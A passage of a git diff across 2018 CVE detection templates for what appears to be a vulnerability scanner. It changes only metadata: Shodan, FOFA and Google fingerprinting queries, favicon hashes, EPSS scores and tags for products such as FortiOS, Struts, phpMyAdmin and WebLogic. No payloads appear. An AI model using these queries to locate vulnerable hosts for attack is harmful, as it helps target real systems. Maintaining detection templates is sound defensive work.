fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli variables: diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml index c8ebb8e65a..d5ad65b0ee 100644 --- a/http/cves/2018/CVE-2018-10738.yaml +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -22,8 +22,11 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli variables: diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index 439df260bd..a32ac3c2fc 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -23,7 +23,7 @@ info: vendor: attribute_wizard_project product: attribute_wizard framework: prestashop - tags: prestashop,attributewizardpro,intrusive,file-upload + tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 0bef67a5c0..4cabdcd22c 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: ipconfigure product: orchid_core_vms - shodan-query: http.title:"Orchid Core VMS" + shodan-query: + - http.title:"Orchid Core VMS" + - http.title:"orchid core vms" fofa-query: title="orchid core vms" google-query: intitle:"orchid core vms" tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index ccdd6b9943..14aa3e5b3e 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - epss-score: 0.81162 - epss-percentile: 0.98059 + epss-score: 0.83856 + epss-percentile: 0.98466 cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 2b8a43c127..ca82948284 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: apache product: tomcat_jk_connector - shodan-query: title:"Apache Tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" fofa-query: title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2018,cve,apache,tomcat,httpd,mod-jk diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 7989de9eaa..752e155c16 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2018,packetstorm,apache,rce,struts,kev diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index fd94e8bf70..c22d2b2667 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve,cve2018,packetstorm,tomcat,redirect,apache diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 22feebf055..92eb351c35 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 - epss-score: 0.36029 - epss-percentile: 0.9677 + epss-score: 0.32403 + epss-percentile: 0.97019 cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index e029096e0d..1536869918 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.01442 - epss-percentile: 0.86338 + epss-percentile: 0.866 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 359bdefacf..fd2453b61a 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: phpmyadmin product: phpmyadmin - shodan-query: http.title:"phpmyadmin" - fofa-query: title="phpmyadmin" + shodan-query: + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 792a5d855d..baa5ad7390 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -26,8 +26,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1273 cwe-id: CWE-20,CWE-94 - epss-score: 0.97515 - epss-percentile: 0.99982 + epss-score: 0.97466 + epss-percentile: 0.99962 cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 9092672f1f..b724358105 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: webgrind_project product: webgrind - fofa-query: app="Webgrind" + fofa-query: + - app="Webgrind" + - app="webgrind" tags: cve,cve2018,lfi,webgrind,webgrind_project http: diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index cf3a399d3d..08c4189776 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: fortinet product: fortios - shodan-query: http.html:"/remote/login" "xxxxxxxx" - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2018,cve,fortios,lfi,kev,fortinet http: diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 1f6241640e..5ddc4280bb 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: fortinet product: fortios - shodan-query: http.html:"/remote/login" "xxxxxxxx" - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve,cve2018,fortios,xss,fortinet http: diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index d80782ef1c..fc2aa60f54 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -27,9 +27,15 @@ info: max-request: 1 vendor: synacor product: zimbra_collaboration_suite - shodan-query: http.title:"zimbra collaboration suite" - fofa-query: title="zimbra web client sign in" - google-query: intitle:"zimbra collaboration suite" + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve,cve2018,xss,zimbra,synacor http: diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index a521785628..8c99238867 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - https://medium.com/%40s1kr10s/velotismart-0day-ca5056bcdcac + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 epss-score: 0.15741 - epss-percentile: 0.95409 + epss-percentile: 0.95931 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index cddf9426d8..3a661a3cff 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - epss-score: 0.96539 - epss-percentile: 0.99521 + epss-score: 0.96192 + epss-percentile: 0.99513 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 02090d2feb..99e6932f5d 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: loytec product: lgate-902_firmware - shodan-query: http.html:"LGATE-902" + shodan-query: + - http.html:"LGATE-902" + - http.html:"lgate-902" fofa-query: body="lgate-902" tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 7769d3d9b3..4863766182 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -13,13 +13,14 @@ info: - https://cxsecurity.com/issue/WLB-2018080070 - https://www.exploit-db.com/exploits/45167/ - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 epss-score: 0.21114 - epss-percentile: 0.95976 + epss-percentile: 0.96408 cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 1db18b2221..ed5edeb9d7 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: jorani_project product: jorani - shodan-query: title:"Login - Jorani" + shodan-query: + - title:"Login - Jorani" + - http.favicon.hash:-2032163853 fofa-query: icon_hash=-2032163853 tags: cve,cve2018,jorani,xss,jorani_project diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index e9bddd04e4..a154fbc631 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index b01dcb1143..6beb396f94 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: bibliosoft product: bibliopac - shodan-query: title:"Bibliopac" + shodan-query: + - title:"Bibliopac" + - http.title:"bibliopac" fofa-query: title="bibliopac" google-query: intitle:"bibliopac" tags: cve,cve2018,xss,bibliopac,bibliosoft diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 417ee6ca3a..6059d6f5b1 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -29,8 +29,8 @@ info: vendor: codemenschen product: gift_vouchers framework: wordpress - fofa-query: body="/wp-content/plugins/gift-voucher/" shodan-query: http.html:"/wp-content/plugins/gift-voucher/" + fofa-query: body="/wp-content/plugins/gift-voucher/" tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index d619183fcc..967f04bd8f 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16668 cwe-id: CWE-287 epss-score: 0.00189 - epss-percentile: 0.55432 + epss-percentile: 0.56242 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 82a7c3ab6a..1fabdefdf7 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: dotcms product: dotcms - shodan-query: http.title:"dotCMS" + shodan-query: + - http.title:"dotCMS" + - http.title:"dotcms" fofa-query: title="dotcms" google-query: intitle:"dotcms" tags: cve2018,cve,redirect,dotcms diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index fe101065ea..ec8b051602 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: kubernetes product: dashboard - shodan-query: product:"Kubernetes" + shodan-query: + - product:"Kubernetes" + - product:"kubernetes" tags: cve,cve2018,kubernetes,k8s,auth-bypass http: diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index a995d5aba7..91fdf83e50 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -20,16 +20,21 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18608 cwe-id: CWE-79 - epss-score: 0.00177 - epss-percentile: 0.54991 + epss-score: 0.001 + epss-percentile: 0.41301 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dedecms product: dedecms - shodan-query: http.html:"DedeCms" - fofa-query: body="dedecms" + shodan-query: + - http.html:"DedeCms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + - http.html:"dedecms" + fofa-query: + - body="dedecms" + - app="dedecms" tags: cve2018,cve,dedecms,xss http: diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 3e8b1624af..091e45eb21 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: acme product: mini-httpd - shodan-query: 'Server: mini_httpd && 200' + shodan-query: + - 'Server: mini_httpd && 200' + - cpe:"cpe:2.3:a:acme:mini-httpd" + - "server: mini_httpd && 200" tags: cve,cve2018,lfi,mini_httpd,acme http: diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 7f19b027a3..c39437908b 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: tibco product: jasperreports_library - shodan-query: html:"jasperserver-pro" + shodan-query: + - html:"jasperserver-pro" + - http.html:"jasperserver-pro" fofa-query: body="jasperserver-pro" tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 656f2b91d4..85e689d5d6 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -26,9 +26,11 @@ info: max-request: 2 vendor: gogs product: gogs - google-query: intitle:"sign in - gogs" - shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + shodan-query: + - cpe:"cpe:2.3:a:gogs:gogs" + - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve,cve2018,gogs,lfi,rce,vulhub http: diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index f7e60c03fc..979ca8a95b 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -30,9 +30,9 @@ info: vendor: ninjaforma product: ninja_forms framework: wordpress - publicwww-query: /wp-content/plugins/ninja-forms/ shodan-query: http.html:/wp-content/plugins/ninja-forms/ fofa-query: body=/wp-content/plugins/ninja-forms/ + publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma http: diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 3f65170707..865adb4626 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: zyxel product: vmg1312-b10d_firmware - shodan-query: http.html:"VMG1312-B10D" + shodan-query: + - http.html:"VMG1312-B10D" + - http.html:"vmg1312-b10d" fofa-query: body="vmg1312-b10d" tags: cve2018,cve,lfi,modem,router,edb,zyxel diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 5e97818e28..3e88248f87 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: wowza product: streaming_engine - shodan-query: http.title:"manager" product:"wowza streaming engine" + shodan-query: + - http.title:"manager" product:"wowza streaming engine" + - cpe:"cpe:2.3:a:wowza:streaming_engine" fofa-query: title="manager" product:"wowza streaming engine" google-query: intitle:"manager" product:"wowza streaming engine" tags: cve2018,cve,wowza,lfi diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 7cc00d6e2e..93a1a9baa4 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19751 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 + epss-score: 0.00078 + epss-percentile: 0.33785 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 860a40a6b3..581b4f70d4 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19877 cwe-id: CWE-79 - epss-score: 0.00241 - epss-percentile: 0.63554 + epss-score: 0.00204 + epss-percentile: 0.58366 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 90d48ccdab..7950bb3bd4 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-20010 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50703 + epss-score: 0.00126 + epss-percentile: 0.47199 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index cba4b2656c..a886533c65 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2018-20462 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.63916 + epss-percentile: 0.64545 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: jsmol2wp_project + max-request: 2 + vendor: "jsmol2wp_project" product: jsmol2wp framework: wordpress tags: cve2018,cve,wordpress,xss,wp-plugin,jsmol2wp_project - flow: http(1) && http(2) http: diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 8d404e7272..a45543cd4d 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -29,9 +29,11 @@ info: max-request: 2 vendor: roxyfileman product: roxy_fileman - google-query: intitle:"Roxy file manager" shodan-query: http.title:"roxy file manager" fofa-query: title="roxy file manager" + google-query: + - intitle:"Roxy file manager" + - intitle:"roxy file manager" tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman http: diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 4135025d8b..b5ace6eb8a 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -27,7 +27,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve2018,cve,atlassian,jira,xss http: diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index aba5e76e50..4154a5580e 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 938d71b76f..594ed4bde9 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -28,7 +28,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2018,atlassian,confluence,xss http: diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 0394c5bda9..5ce7802bfc 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: getgrav product: grav_cms - shodan-query: html:"Grav CMS" + shodan-query: + - html:"Grav CMS" + - http.html:"grav cms" fofa-query: body="grav cms" tags: cve,cve2018,xss,grav,getgrav diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index 42d6e8e136..42ba6c036c 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: sugarcrm product: sugarcrm - shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" - google-query: intext:"SugarCRM Inc. All Rights Reserved" - fofa-query: body="sugarcrm inc. all rights reserved" + shodan-query: + - http.html:"SugarCRM Inc. All Rights Reserved" + - http.title:sugarcrm + - http.html:"sugarcrm inc. all rights reserved" + fofa-query: + - body="sugarcrm inc. all rights reserved" + - title=sugarcrm + google-query: + - intext:"SugarCRM Inc. All Rights Reserved" + - intitle:sugarcrm + - intext:"sugarcrm inc. all rights reserved" tags: cve2018,cve,sugarcrm,xss,edb http: diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index ceddc694fa..2ab0e02d95 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -28,7 +28,10 @@ info: max-request: 1 vendor: zeit product: next.js - shodan-query: html:"/_next/static" + shodan-query: + - html:"/_next/static" + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" tags: cve2018,cve,nextjs,lfi,traversal,zeit diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index e491283770..795bd92f3b 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -19,17 +19,25 @@ info: cvss-score: 6.1 cve-id: CVE-2018-6200 cwe-id: CWE-601 - epss-score: 0.00141 - epss-percentile: 0.48943 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: vbulletin product: vbulletin - google-query: intext:"powered by vbulletin" - shodan-query: http.title:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - http.title:"powered by vbulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve,cve2018,redirect,vbulletin http: diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 9555cd9020..8688ccbff7 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-6530 cwe-id: CWE-78 epss-score: 0.93644 - epss-percentile: 0.99057 + epss-percentile: 0.99102 cpe: cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6605.yaml b/http/cves/2018/CVE-2018-6605.yaml index e78d4b6ca4..3a85283d87 100644 --- a/http/cves/2018/CVE-2018-6605.yaml +++ b/http/cves/2018/CVE-2018-6605.yaml @@ -23,9 +23,10 @@ info: vendor: zh_baidumap_project product: zh_baidumap framework: joomla\! - fofa-query: app="Joomla!-网站安装" - tags: cve,cve2018,joomla,sqli - + fofa-query: + - app="Joomla!-网站安装" + - app="joomla!-网站安装" + tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 8cfdc5acb1..8fb53faba4 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: dedecms product: dedecms - fofa-query: body="dedecms" - shodan-query: http.html:"dedecms" + shodan-query: + - http.html:"dedecms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + fofa-query: + - body="dedecms" + - app="dedecms" tags: cve,cve2018,dedecms http: diff --git 